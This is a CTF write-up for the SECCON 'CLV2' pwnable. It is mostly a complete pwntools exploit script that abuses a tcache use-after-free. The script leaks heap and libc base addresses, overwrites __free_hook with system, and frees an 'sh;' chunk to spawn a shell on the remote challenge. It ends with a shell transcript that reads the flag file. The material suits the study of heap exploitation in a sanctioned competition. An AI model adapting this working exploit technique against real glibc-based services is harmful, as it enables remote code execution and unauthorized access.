Category : pwnable
CLV2 — 489 — 3 Solves — "Pwn me, and Prove yourself" — nc clv2.pwn.seccon.jp 31337
Summary : tcache, use after free
Exploit
#!/usr/bin/python
from pwn import *
def cmd_register(name):
    """Drive the [R]egister menu entry with *name*.

    Waits for the end of the main menu, selects 'R', answers the 'name?'
    prompt with *name* and returns the first space-separated token of the
    reply line (trailing newline stripped).
    """
    ru('[E]xit\n')
    sl('R')
    ru('name?\n')
    sl(name)
    reply = rl(False)
    return reply.split(' ')[0]
def cmd_login(name):
    """Drive the [L]ogin menu entry and submit *name* at the 'User : ' prompt."""
    dialogue = (
        ('[E]xit\n', 'L'),
        ('User : ', name),
    )
    for expect, answer in dialogue:
        ru(expect)
        sl(answer)
def cmd_play():
    """Select [P]lay from the main menu (no prompt is consumed afterwards)."""
    menu_end = '[E]xit\n'
    ru(menu_end)
    sl('P')
def cmd_add_prov(method, word):
    """Add one entry through the [A]dd menu.

    *word* is written with ss() (raw send), so no newline is appended to it;
    *method* is sent as a decimal string at the '[3]' selection prompt.
    Returns once the service has printed 'Added!'.
    """
    ru('[E]xit\n')
    sl('A')
    ru('words > ')
    ss(word)  # raw send on purpose: the word is not newline-terminated
    ru('[3]\n')
    sl(str(method))
    for marker in ('...\n', 'Added!'):
        ru(marker)
def cmd_show_prov(hint, All=False):
    """Read entries back through the [S]how menu.

    With All=False the entry addressed by *hint* is requested and the text
    after ' : ' on the reply line is returned as a str.  With All=True the
    constant hint 0x1cafe is sent instead and every 'N : value' line up to
    the '=====...' separator is collected into a dict keyed by int(N).

    Note the return type depends on *All* (str vs dict); callers in this
    script only use the str form.
    """
    ru('[E]xit\n')
    sl('S')
    ru('[N]o\n')
    sl('Y')
    ru('Hint : ')  # both modes answer this prompt next
    if not All:
        sl(str(hint))
        fields = rl(False).split(' : ')
        return fields[1]
    sl(str(0x1cafe))
    entries = {}
    while True:
        line = rl(False)
        if '=================' in line:
            return entries
        fields = line.split(' : ')
        entries[int(fields[0])] = fields[1]
def cmd_del_prov(hint):
    """Delete the entry addressed by *hint* via the [D]elete menu and wait for 'Deleted!'."""
    dialogue = (
        ('[E]xit\n', 'D'),
        ('Hint : ', str(hint)),
    )
    for expect, answer in dialogue:
        ru(expect)
        sl(answer)
    ru('Deleted!\n')
def calc_hint(x):
    """Return the byte-sum 'hint' of string *x*, folded above 0x100.

    Sums of at most 0x100 are returned unchanged; larger sums become
    (sum & 0xff) + 0x100.  Presumably mirrors how the service derives an
    entry's hint from its contents (not confirmed here); the script below
    does not call it and uses the raw sum inline instead.
    """
    total = sum(ord(ch) for ch in x)
    return total if total <= 0x100 else (total & 0xff) + 0x100
#s = process('./clv2')
# Connect to the remote challenge instance; the commented-out process()
# line is the local-debugging variant of the same script.
s = remote('clv2.pwn.seccon.jp', 31337)
# Short aliases that the cmd_* helpers above resolve at call time.
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send
# Registered name: 'pwn3r' plus 0x23 copies of a 16-byte 'MAST=pwn3r'
# record and two trailing bytes.  The writeup does not say why this exact
# layout is needed (review: presumably consumed by the register handler --
# confirm against the binary).
cmd_register('pwn3r\x00\x00\x00'+'MAST=pwn3r\x00'.ljust(0x10, '\x00') * 0x23 + '\x88\x56')
#s.interactive()
#cmd_login('pwn3r')
cmd_play()
################ heap leak ##################
# Entries are addressed by the byte sum of their contents, hence
# ord('A') / ord('B') as hints.  Two entries are added and freed, a third
# is added, and its contents are read back and interpreted as a pointer;
# the hard-coded delta turns it into heap_base.  Every delta in this script
# is specific to the challenge's binary and libc build, so the script is
# not portable to other builds.
cmd_add_prov(2, 'B')
cmd_add_prov(2, 'A')
cmd_del_prov(ord('A'))
cmd_del_prov(ord('B'))
cmd_add_prov(2, 'C')
heap_base = u64(cmd_show_prov(ord('C')).ljust(8, '\x00')) - 0x500343
print hex(heap_base)  # Python 2 print statement: this script is Python 2 only
cmd_del_prov(ord('C'))
#############################################
################ libc leak ##################
# Eight 0x91-byte entries whose first byte is 0x17-i followed by 0x90 bytes
# of 0x01, i.e. byte sums 0xa7-i (hints 0xa7 .. 0xa0).  They are then deleted
# as 0xa0 .. 0xa7, which is the reverse of insertion order.
for i in range(8):
    cmd_add_prov(2, chr(0x17 - i).ljust(0x91, '\x01'))
for i in range(8):
    cmd_del_prov(0xa0 + i)
# Three fresh entries; 'F' is read back and rebased to libc_base.
cmd_add_prov(2, 'D')
cmd_add_prov(2, 'E')
cmd_add_prov(2, 'F')
libc_base = u64(cmd_show_prov(ord('F')).ljust(8, '\x00')) - 0x3ebd46 # libc_leak
# libc-build-specific offsets; the writeup does not name the libc version.
libc_free_hook = libc_base + 0x3ed8e8
libc_system = libc_base + 0x4f440
print hex(libc_base)
cmd_del_prov(ord('F'))
cmd_del_prov(ord('E'))
cmd_del_prov(ord('D'))
#############################################
########## overwrite __free_hook ############
for i in range(0, 4):
    cmd_add_prov(2, chr(0x24-i)*0x47) # pop from tcache
cmd_add_prov(2, '\x10' * 0x67)  # byte sum 0x10 * 0x67 = 0x670, deleted by that hint below
# First crafted buffer: zeros, a 1, a heap pointer (heap_base + 0x205b0),
# the value 8, and zero padding.
fake_chunk = ''
fake_chunk += p64(0) * 4
fake_chunk += p64(0x1)
fake_chunk += p64(heap_base + 0x205b0)
fake_chunk += p64(8)
fake_chunk += p64(0) * 4 # padding
# Because entries are addressed by byte sum, the first 24 bytes are
# rewritten so the whole buffer sums to exactly 0x565 while bytes from
# offset 0x18 onward are kept.  Why 0x565 is the required value is not
# stated in the writeup.  `tt / 24` is Python 2 integer division; under
# Python 3 it would yield a float and chr() would raise.
hint = sum(map(ord, fake_chunk))#calc_hint(fake_chunk)
tt = (0x565 - hint)
fake_chunk = chr(tt / 24) * 23 + chr(tt - (tt / 24) * 23) + fake_chunk[0x18:]
cmd_add_prov(2, fake_chunk)
cmd_add_prov(2, 'a')
cmd_del_prov(ord('a'))
# Second crafted buffer, same byte-sum adjustment with target 0x464; it
# carries ord('a') and a second heap pointer (heap_base + 0x500840).
fake_chunk_ptr = ''
fake_chunk_ptr += p64(0) * 4
fake_chunk_ptr += p64(ord('a'))
fake_chunk_ptr += p64(0) * 2
fake_chunk_ptr += p64(heap_base + 0x500840)
hint = sum(map(ord, fake_chunk_ptr))
tt = (0x464 - hint)
fake_chunk_ptr = chr(tt / 24) * 23 + chr(tt - (tt / 24) * 23) + fake_chunk_ptr[0x18:]
cmd_add_prov(2, fake_chunk_ptr)
cmd_add_prov(2, 'a')
cmd_del_prov(0x67 * 0x10)
cmd_del_prov(1)
# Author's debugger note on the resulting heap state (addresses are from
# one particular run):
# (0x50) tcache_entry[3]: 0x55c7c13905b0 --> 0x55c7c13905b0 (overlap chunk with 0x55c7c13905a0(freed) )
# Three 0x46-byte entries: the __free_hook address, a filler, and the
# system address, followed by the 'sh;' entry whose deletion is the trigger
# (the shell seen in the transcript below comes from that free).
cmd_add_prov(2, p64(libc_free_hook).ljust(0x48-2, '\x01'))
cmd_add_prov(2, ''.ljust(0x48-2, '\x01'))
cmd_add_prov(2, p64(libc_system).ljust(0x48-2, '\x01'))
cmd_add_prov(2, 'sh;')
# cmd_del_prov
# Inlined cmd_del_prov without the final ru('Deleted!\n'), presumably
# because no 'Deleted!' line is expected back once the shell is spawned.
ru('[E]xit\n')
sl('D')
ru('Hint : ')
sl(str(sum(map(ord, 'sh;'))))
#############################################
# The writeup runs this script in a retry loop (see the shell transcript
# below): it does not succeed on every connection.
s.interactive()
s.close()
$ while [ 1 ] ; do python pwn3r.py ; done
..................................
..................................
e 54, in recv_raw
raise EOFError
EOFError
[*] Closed connection to clv2.pwn.seccon.jp port 31337
[+] Opening connection to clv2.pwn.seccon.jp on port 31337: Done
0x55de14578000
0x7f4d2d589000
[*] Switching to interactive mode
$ id
uid=1001 gid=1001 groups=1001
$ cat /home/clv2/flag.txt
SECCON{??????????????????????????}